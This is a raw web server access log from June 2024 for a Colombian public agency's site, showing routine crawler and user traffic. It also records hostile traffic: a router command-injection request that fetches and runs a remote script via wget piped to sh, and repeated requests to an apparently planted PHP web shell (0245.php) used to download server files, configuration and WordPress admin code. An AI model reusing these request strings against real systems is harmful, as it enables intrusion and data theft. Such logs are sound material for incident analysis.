201.245.192.253 - - [16/Jun/2024:21:58:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:58:28 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [16/Jun/2024:21:58:28 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [16/Jun/2024:21:58:28 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [16/Jun/2024:21:58:28 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [16/Jun/2024:21:58:28 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [16/Jun/2024:21:58:28 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [16/Jun/2024:21:58:38 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [16/Jun/2024:21:58:38 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [16/Jun/2024:21:58:38 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [16/Jun/2024:21:58:38 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
47.128.50.43 - - [16/Jun/2024:21:58:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cschema%5C&f=Eps_Relation_Schema.class.php&ft=download&white=1 HTTP/1.1" 200 25054
172.22.2.4 - - [16/Jun/2024:21:58:55 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 494045
216.245.221.92 - - [16/Jun/2024:21:59:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:21:59:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:21:59:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:57:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.46.44 - - [16/Jun/2024:21:59:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000&f=2000+2850-2899.tif&ft=download HTTP/1.1" 200 954012
66.249.66.20 - - [16/Jun/2024:21:59:32 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-82.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2024:21:58:27 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 32715
47.128.19.246 - - [16/Jun/2024:22:00:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2451-2500&f=00002485.tif&ft=download HTTP/1.1" 200 202160
172.22.2.4 - - [16/Jun/2024:21:58:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47256
201.245.192.253 - - [16/Jun/2024:22:00:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
168.119.61.24 - - [16/Jun/2024:22:00:43 -0500] "GET / HTTP/1.1" 200 4720
47.128.46.248 - - [16/Jun/2024:22:00:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5C&f=wp-links-opml.php&ft=download&white=1 HTTP/1.1" 200 2380
201.245.192.253 - - [16/Jun/2024:22:01:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.35.158 - - [16/Jun/2024:22:01:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cincludes&f=media.php&ft=download HTTP/1.1" 200 100361
47.128.25.250 - - [16/Jun/2024:22:02:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1751-1800&f=00001786.tif&ft=download HTTP/1.1" 200 97955
216.244.66.195 - - [16/Jun/2024:22:02:12 -0500] "GET /BLA/resoluciones/AUTOS%202016/0821.pdf HTTP/1.1" 200 475540
200.118.80.127 - - [16/Jun/2024:22:02:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/2703.pdf HTTP/1.1" 200 1174842
200.118.80.127 - - [16/Jun/2024:22:02:14 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.244.66.195 - - [16/Jun/2024:22:02:18 -0500] "GET /BLA/resoluciones/AUTOS%202016/0866.pdf HTTP/1.1" 200 807950
201.245.192.253 - - [16/Jun/2024:22:02:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
185.191.127.212 - - [16/Jun/2024:22:02:32 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
47.128.17.162 - - [16/Jun/2024:22:02:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2024&f=00560.pdf&ft=download HTTP/1.1" 200 491174
201.245.192.253 - - [16/Jun/2024:22:03:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.47.98 - - [16/Jun/2024:22:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2643.pdf&ft=download HTTP/1.1" 200 360103
216.245.221.92 - - [16/Jun/2024:22:04:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:22:04:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.25.233 - - [16/Jun/2024:22:04:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3184.pdf&ft=download&white=1 HTTP/1.1" 200 405159
201.245.192.253 - - [16/Jun/2024:22:04:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:22:04:38 -0500] "GET /BLA/resoluciones/AUTOS%202010/6588.pdf HTTP/1.1" 200 6321405
47.128.32.182 - - [16/Jun/2024:22:04:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=category-template.php&ft=download HTTP/1.1" 200 47631
173.252.107.11 - - [16/Jun/2024:22:04:58 -0500] "GET /generadores-de-residuos-hospitalarios-son-responsables-solidarios-sobre-la-correcta-disposicion.html HTTP/1.1" 200 974
173.252.107.6 - - [16/Jun/2024:22:04:58 -0500] "GET /generadores-de-residuos-hospitalarios-son-responsables-solidarios-sobre-la-correcta-disposicion.html HTTP/1.1" 200 974
216.244.66.195 - - [16/Jun/2024:22:05:04 -0500] "GET /BLA/resoluciones/AUTOS%202010/6767.pdf HTTP/1.1" 200 479682
172.22.2.4 - - [16/Jun/2024:22:03:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:22:05:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0661.pdf HTTP/1.1" 200 686653
201.245.192.253 - - [16/Jun/2024:22:05:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:22:05:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2311.pdf HTTP/1.1" 200 1708249
47.128.41.63 - - [16/Jun/2024:22:05:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0967.pdf&ft=download HTTP/1.1" 200 401063
167.94.138.56 - - [16/Jun/2024:22:05:38 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [16/Jun/2024:22:05:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2379.pdf HTTP/1.1" 200 461851
167.94.138.56 - - [16/Jun/2024:22:05:53 -0500] "GET / HTTP/1.1" 200 319
167.94.138.56 - - [16/Jun/2024:22:05:54 -0500] "PRI * HTTP/2.0" 400 946
167.94.138.56 - - [16/Jun/2024:22:05:56 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.244.66.195 - - [16/Jun/2024:22:06:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2440.pdf HTTP/1.1" 200 362041
172.22.2.4 - - [16/Jun/2024:22:04:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
216.244.66.195 - - [16/Jun/2024:22:06:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2556.pdf HTTP/1.1" 200 507415
47.128.36.67 - - [16/Jun/2024:22:06:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2039.pdf&ft=download&white=1 HTTP/1.1" 200 360103
201.245.192.253 - - [16/Jun/2024:22:06:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:22:06:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0070.pdf HTTP/1.1" 200 514677
216.244.66.195 - - [16/Jun/2024:22:06:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0244.pdf HTTP/1.1" 200 2021728
47.128.52.133 - - [16/Jun/2024:22:06:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4573.pdf&ft=download&white=1 HTTP/1.1" 200 360103
216.244.66.195 - - [16/Jun/2024:22:07:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0292.pdf HTTP/1.1" 200 493870
201.245.192.253 - - [16/Jun/2024:22:07:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:22:07:36 -0500] "GET /BLA/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000002%20DEL%2031%20DE%20ENERO%20DEL%202024.pdf HTTP/1.1" 200 382171
47.128.51.95 - - [16/Jun/2024:22:07:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3196.pdf&ft=download&white=1 HTTP/1.1" 200 20134
216.244.66.195 - - [16/Jun/2024:22:07:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0329.pdf HTTP/1.1" 200 2747251
201.245.192.253 - - [16/Jun/2024:22:08:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.25.181 - - [16/Jun/2024:22:08:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1870.pdf&ft=download&white=1 HTTP/1.1" 200 372391
216.244.66.195 - - [16/Jun/2024:22:08:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0629.pdf HTTP/1.1" 200 551833
66.249.66.20 - - [16/Jun/2024:22:08:33 -0500] "GET /BLA/resoluciones/AUTOS%202023/1887.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2024:22:08:45 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [16/Jun/2024:22:08:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
216.245.221.92 - - [16/Jun/2024:22:09:02 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:22:09:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0877.pdf HTTP/1.1" 200 2652418
47.128.53.22 - - [16/Jun/2024:22:09:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp&f=php3A51.tmp&ft=download HTTP/1.1" 200 27
201.245.192.253 - - [16/Jun/2024:22:09:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
172.22.2.4 - - [16/Jun/2024:22:08:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [16/Jun/2024:22:09:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
207.46.13.7 - - [16/Jun/2024:22:09:23 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
47.128.58.57 - - [16/Jun/2024:22:09:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=cache.php&ft=download&white=1 HTTP/1.1" 200 19180
216.244.66.195 - - [16/Jun/2024:22:10:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1117.pdf HTTP/1.1" 200 479460
201.245.192.253 - - [16/Jun/2024:22:10:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.62.183 - - [16/Jun/2024:22:10:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes&f=ms-deprecated.php&ft=download HTTP/1.1" 200 8984
199.16.157.183 - - [16/Jun/2024:22:10:26 -0500] "GET /images/pl%C3%A1sticos%20foto%201..jpg HTTP/1.1" 404 1034
199.16.157.182 - - [16/Jun/2024:22:10:27 -0500] "GET /representantes-de-colombia-y-europa-se-reunieron-para-desarrollar-estrategias-innovadoras-en-la-gestion-del-plastico.html HTTP/1.1" 200 851
216.244.66.195 - - [16/Jun/2024:22:10:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1701.pdf HTTP/1.1" 200 440829
46.4.37.57 - - [16/Jun/2024:22:10:39 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2024:22:09:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.62.167 - - [16/Jun/2024:22:11:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Crdc&f=conexion.php&ft=download HTTP/1.1" 200 671
216.244.66.195 - - [16/Jun/2024:22:11:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1788.pdf HTTP/1.1" 200 518824
201.245.192.253 - - [16/Jun/2024:22:11:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.58.7 - - [16/Jun/2024:22:11:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4100.pdf&ft=download&white=1 HTTP/1.1" 200 380583
216.244.66.195 - - [16/Jun/2024:22:11:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1815.pdf HTTP/1.1" 200 327736
172.22.2.4 - - [16/Jun/2024:22:10:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56191
201.245.192.253 - - [16/Jun/2024:22:12:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:22:12:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2029.pdf HTTP/1.1" 200 309645
47.128.110.106 - - [16/Jun/2024:22:12:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=pluggable.php&ft=download&white=1 HTTP/1.1" 200 79105
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 27040
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
191.95.52.19 - - [16/Jun/2024:22:12:31 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
52.167.144.203 - - [16/Jun/2024:22:12:47 -0500] "GET /Publicaciones/2024EE68618.pdf HTTP/1.1" 200 646407
216.244.66.195 - - [16/Jun/2024:22:12:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2270.pdf HTTP/1.1" 200 282003
172.22.2.4 - - [16/Jun/2024:22:11:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
47.128.41.139 - - [16/Jun/2024:22:13:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes&f=ms-deprecated.php&ft=download HTTP/1.1" 200 8984
201.245.192.253 - - [16/Jun/2024:22:13:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:22:13:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2938.pdf HTTP/1.1" 200 307661
47.128.20.202 - - [16/Jun/2024:22:13:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2832.pdf&ft=download&white=1 HTTP/1.1" 200 458407
52.167.144.203 - - [16/Jun/2024:22:14:00 -0500] "GET /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 302 -
52.167.144.203 - - [16/Jun/2024:22:14:01 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12411
216.245.221.92 - - [16/Jun/2024:22:14:02 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:22:14:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3507.pdf HTTP/1.1" 200 304018
201.245.192.253 - - [16/Jun/2024:22:14:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:22:14:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [16/Jun/2024:22:14:33 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5578.pdf HTTP/1.1" 304 -
47.128.34.205 - - [16/Jun/2024:22:14:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1251-1300&f=00001284.tif&ft=download HTTP/1.1" 200 148468
216.244.66.195 - - [16/Jun/2024:22:14:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0078.pdf HTTP/1.1" 200 448281
47.128.41.150 - - [16/Jun/2024:22:15:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=users.php&ft=download&white=1 HTTP/1.1" 200 16388
216.244.66.195 - - [16/Jun/2024:22:15:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1470.pdf HTTP/1.1" 200 351338
201.245.192.253 - - [16/Jun/2024:22:15:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
173.252.95.10 - - [16/Jun/2024:22:15:40 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
112.254.132.247 - - [16/Jun/2024:22:15:29 -0500] "POST /HNAP1/ HTTP/1.0" 400 945
47.128.59.36 - - [16/Jun/2024:22:15:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2193.pdf&ft=download HTTP/1.1" 200 515751
216.244.66.195 - - [16/Jun/2024:22:16:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1538.pdf HTTP/1.1" 200 2573878
201.245.192.253 - - [16/Jun/2024:22:16:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:22:16:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1720.pdf HTTP/1.1" 200 284061
47.128.31.44 - - [16/Jun/2024:22:16:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0523.pdf&ft=download HTTP/1.1" 200 470695
172.22.2.4 - - [16/Jun/2024:22:15:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:22:17:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2326.pdf HTTP/1.1" 200 271903
201.245.192.253 - - [16/Jun/2024:22:17:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.51.0 - - [16/Jun/2024:22:17:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1301-1350&f=00001306.tif&ft=download HTTP/1.1" 200 160216
66.249.66.19 - - [16/Jun/2024:22:17:33 -0500] "GET /Publicaciones/2024EE67495.pdf HTTP/1.1" 404 227
216.244.66.195 - - [16/Jun/2024:22:17:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2587.pdf HTTP/1.1" 200 357195
172.22.2.4 - - [16/Jun/2024:22:16:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52783
201.245.192.253 - - [16/Jun/2024:22:16:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 21442
201.245.192.253 - - [16/Jun/2024:22:17:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34554
47.128.59.90 - - [16/Jun/2024:22:18:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cgis&f=GIS_Factory.class.php&ft=download HTTP/1.1" 200 1834
216.244.66.195 - - [16/Jun/2024:22:18:03 -0500] "GET /BLA/resoluciones/AUTOS%202014/0965.pdf HTTP/1.1" 200 950057
201.245.192.253 - - [16/Jun/2024:22:18:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.26.87 - - [16/Jun/2024:22:18:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3741.pdf&ft=download HTTP/1.1" 200 376487
201.245.192.253 - - [16/Jun/2024:22:18:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34439
216.245.221.92 - - [16/Jun/2024:22:19:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:22:19:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:22:19:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.96 - - [16/Jun/2024:22:19:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4588.pdf&ft=download&white=1 HTTP/1.1" 200 343719
201.245.192.253 - - [16/Jun/2024:22:19:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34554
47.128.110.104 - - [16/Jun/2024:22:20:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cautodeclaracion%5C&f=presentacion.php&ft=download&white=1 HTTP/1.1" 200 13356
201.245.192.253 - - [16/Jun/2024:22:20:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
200.118.61.36 - - [16/Jun/2024:22:20:22 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+TnPeoEq32qqx5dRcMeMiokEEeDEEY9TbMUmFebXDOWtiMYkqk1FleL/tYma3jM/YNEHkNS1nHoQ==&y=U2FsdGVkX1/bTYo1ktL+2RrZeEL+bKYQdH9xllxjWGEcm25H4RSMcVJBXGt+I56f HTTP/1.1" 200 30
200.118.61.36 - - [16/Jun/2024:22:20:22 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+0KhVJsy2PYE5p7pRDaiH1oa2zagzqVj1GxXIB0wypjsC7S00RzO/Apt1IIqe+H7WwL9tjif4i1/z/O62kz1hoV6UYaiYeqU8=&u=U2FsdGVkX1+z9rl9clizjH6WkJ7YBC+vRgSMicwOavw+xLKGrwbPf/3SP/CXkiHK&y=U2FsdGVkX1/bTYo1ktL+2RrZeEL+bKYQdH9xllxjWGEcm25H4RSMcVJBXGt+I56f HTTP/1.1" 200 97
